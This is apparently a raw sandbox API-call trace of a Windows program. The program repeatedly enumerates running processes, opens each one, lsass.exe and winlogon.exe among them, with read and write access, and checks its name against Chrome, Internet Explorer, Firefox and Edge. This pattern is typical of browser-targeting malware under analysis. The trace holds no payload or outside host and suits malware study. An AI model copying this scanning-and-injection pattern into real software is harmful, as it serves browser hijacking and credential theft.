	[0230.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.127] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.127] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.128] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.128] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0230.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x670c
	[0230.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.129] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.129] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.130] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.130] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6710
	[0230.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.131] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.131] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.132] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.133] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0230.134] CloseHandle (hObject=0x4fd0) returned 1
	[0230.134] Sleep (dwMilliseconds=0x64) 
	[0230.265] GetCurrentProcessId () returned 0x110
	[0230.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0230.267] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0230.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0230.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0230.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6714
	[0230.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.269] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.270] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.270] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.270] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6718
	[0230.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.271] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.271] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.272] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.272] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0230.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x671c
	[0230.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.273] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0230.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.274] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.274] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0230.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.275] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6720
	[0230.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.276] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.276] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.276] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.277] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0230.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6724
	[0230.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.278] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0230.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.278] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.278] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0230.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.279] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0230.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6728
	[0230.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.280] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0230.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.280] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.281] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0230.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.281] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0230.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x672c
	[0230.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.282] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0230.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.282] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.283] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0230.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.283] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0230.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6730
	[0230.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.284] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.284] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.285] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.285] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6734
	[0230.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.286] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.286] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.287] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.287] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6738
	[0230.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.288] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.289] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.289] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.289] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x673c
	[0230.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.290] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.291] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.291] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6740
	[0230.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.292] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.293] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.293] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.293] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6744
	[0230.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.295] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.295] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6748
	[0230.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.297] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.297] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.297] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.298] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x674c
	[0230.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.299] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.299] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.300] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0230.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6750
	[0230.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.301] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0230.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.301] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.301] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0230.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.302] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6754
	[0230.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.303] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.322] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.322] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.322] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0230.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6758
	[0230.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.324] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.324] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.324] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.325] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x675c
	[0230.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.326] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.326] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.326] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.327] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6760
	[0230.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.328] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.328] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.328] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.329] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6764
	[0230.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.330] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.330] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.330] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.331] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
